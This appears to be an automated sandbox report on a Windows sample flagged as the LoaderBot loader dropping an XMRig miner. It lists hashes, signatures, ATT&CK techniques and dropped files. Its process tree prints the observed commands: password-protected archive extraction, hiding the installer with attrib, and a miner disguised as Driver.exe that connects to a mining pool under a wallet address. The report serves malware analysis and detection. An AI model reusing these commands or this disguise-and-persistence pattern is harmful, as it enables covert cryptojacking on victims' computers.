Resubmissions

30-04-2024 07:55

240430-jshh2sgb91 10

29-04-2024 04:34

240429-e7e91sad56 10

Analysis

  • max time kernel
    60s
  • max time network
    57s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-04-2024 07:55

General

  • Target

    7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe

  • Size

    4.2MB

  • MD5

    b7250436469d05b646b54b00ccb74d7e

  • SHA1

    7ad840124e69004c862d0cf3f722b00cbfbbb9d3

  • SHA256

    7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780

  • SHA512

    599e2a873b14b461c628ef3fb3f9771e11d866ff16012e82fbd614267e4eab268abd0671ad6bca6bcc8a5808e94b5aa1dcbb7ba75c51e78a645f040d60732ba4

  • SSDEEP

    98304:tt5Uqm7J/F8CAXFSubtgfzlM87bnHzNLhs5rugOyMhKGiDy7:ttw7JrAVRclM87bnTNTgOywUy7

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 2 IoCs
  • XMRig Miner payload 5 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe
    "C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3108
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:3600
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p12151210907486279731870130990 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2424
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3760
        • C:\Windows\system32\attrib.exe
          attrib +H "Installer.exe"
          3⤵
          • Views/modifies file attributes
          PID:5092
        • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
          "Installer.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2008
          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1072

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Hide Artifacts

    1
    T1564

    Hidden Files and Directories

    1
    T1564.001

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll
      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
      Filesize

      2.2MB

      MD5

      d39425a0656846d077a08d88c3a1eafd

      SHA1

      11543c91ae879a1ee2218989da8b607db8b6ce83

      SHA256

      d07755415a96e885071720b882f91484be8f00dd14d0c04f294f759425eeeeb3

      SHA512

      20b395b137d8fee88d57e02158e5dfb840d0d5b969332c95d6f3d39f9dec7833e2198eea9bbe144da3ec62850aa1efe622ca4b0fa743285381591ccc2c2e24dd

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
      Filesize

      4.0MB

      MD5

      38f702eca36f4991a2ca55a61e72cb2d

      SHA1

      854064e8d9d3724b9913f3ba47628bad8d150268

      SHA256

      b9057ff1f55c599ee6b322de47cad13dc8d74b63a5a322faf565a610846cca6a

      SHA512

      de46d99091ae5e7df2cd6d89d3a38bdd4d7e1bbb55526d123e97a83d7966e91b910040d637af4aac500bb266cbad464947bebc0789b6c66102d50837d100a480

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
      Filesize

      1.7MB

      MD5

      e28fd981b387bbb881349af3aed72a14

      SHA1

      ccc7321776b8258fae70a199721a2c94b31a0dbd

      SHA256

      c424d7cac793cfbee144add7c081146d6395eb082d85ff2239f923488b36c784

      SHA512

      8af8463a82b7f8cc2bcd47e10d630ad88a1aefa177ca3f444bcfa440eddeb5946468858846ea09fb863a6994caa0baf41bc80b1099d47a38da6f03b60e1510b7

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
      Filesize

      3.3MB

      MD5

      f818b9273775a3e36a2cec53d77d92aa

      SHA1

      1f9a69bc57779cc2ffc5055779f19a89b0590899

      SHA256

      8261f8f25a906439b6a8c87abb58eae50b10f642295559a7cf7563e4584e5bd8

      SHA512

      133fcad998f9f90960e33df7720f35be3ed3fbbba0058ec9ee5c563e8645225f14430fd4b3e503cecd40627701a1600335bcd184b6de133ca092303ab2c5cc1a

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin
      Filesize

      3.3MB

      MD5

      b4f16494a066087384577934692b7dc0

      SHA1

      7324629c7bf5a4c39def42892f6297d6fa01aa89

      SHA256

      0cc20065191fd1d64ac99fea586277e1dcb883adf403fc4228deecb9f5d91099

      SHA512

      905c161f897e177ee1951ed25a5b2eb1f77093306bacdebec0d9b7c703f4aec814f5da332525d135bea0df9f52705998e8ced6f81262f1689bdc6fc1dc99b0af

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat
      Filesize

      475B

      MD5

      854e13db0bbb65f40103fd9109e52253

      SHA1

      d6e56d1751641e68527b001d3d946bdc7423297c

      SHA256

      9c6a028767dd856c4aebb824f845f5e53c90b9568c22d87076bda6aa798f31e3

      SHA512

      728a8b7e5a44323606215dc085543408f33decbcc85649f0955730ab82626e184ac4dd2a2a7b085616aca9320cafecbe1c0d88c9d615222c6d264c03afa30dd0

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

    • memory/1072-56-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/1072-60-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/1072-59-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/1072-58-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/1072-57-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/1108-37-0x0000000000FD0000-0x00000000013CE000-memory.dmp
      Filesize

      4.0MB

    • memory/1108-40-0x0000000006050000-0x00000000060B6000-memory.dmp
      Filesize

      408KB

    • memory/2008-53-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2008-52-0x0000000001FB0000-0x0000000001FC4000-memory.dmp
      Filesize

      80KB

    • memory/2008-50-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB